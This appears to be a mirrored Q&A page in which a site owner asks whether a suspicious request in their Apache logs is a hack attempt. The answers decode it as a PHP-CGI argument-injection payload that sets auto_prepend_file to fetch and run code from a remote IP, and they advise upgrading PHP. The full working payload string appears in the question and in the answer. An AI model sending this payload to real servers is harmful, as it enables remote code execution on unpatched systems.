简体   繁体   中英

PHP - does this look like a hack attempt

/index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F61.19.253.26%2Fecho.txt 

这些很多都在我的apache日志中创建了404,看起来像是PHP hack尝试?

To me, it does look like a hack attempt.

From PHP Release Announcement page

Some systems support a method for supplying a array of strings to the CGI script. This is only used in the case of an `indexed' query. This is identified by a "GET" or "HEAD" HTTP request with a URL search string not containing any unencoded = characters.

The URL-decoded query string looks like this:

/index.php?-dsafe_mode=Off -ddisable_functions=NULL -dallow_url_fopen=On -dallow_url_include=On -dauto_prepend_file=http://61.19.253.26/echo.txt

These are all -d switches, which are used to define php.ini directives. Basically, this is what it changes:

safe_mode=off 
disable_functions=null
allow_url_fopen=on
allow_url_include=on 

And finally, there is auto_prepend_file=http://61.19.253.26/echo.txt -- this directive includes the PHP code located at http://61.19.253.26/echo.txt and execute it before the code inside index.php.

The echo.txt is hosted on a web server somewhere in Thailand and contains <?php echo "dsfer34w5rlsidfosdedfpsd"; ?> <?php echo "dsfer34w5rlsidfosdedfpsd"; ?> . This is probably used to check if your server is vulnerable to attacks.

And if you use Apache mod_cgi / mod_cgid to run a PHP version before 5.3.13 and 5.4.x before 5.4.3 update now : http://www.php.net/downloads.php

Yes.

Read the following page, it explained everything:

http://huguesjohnson.com/programming/hacking-attempt/

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM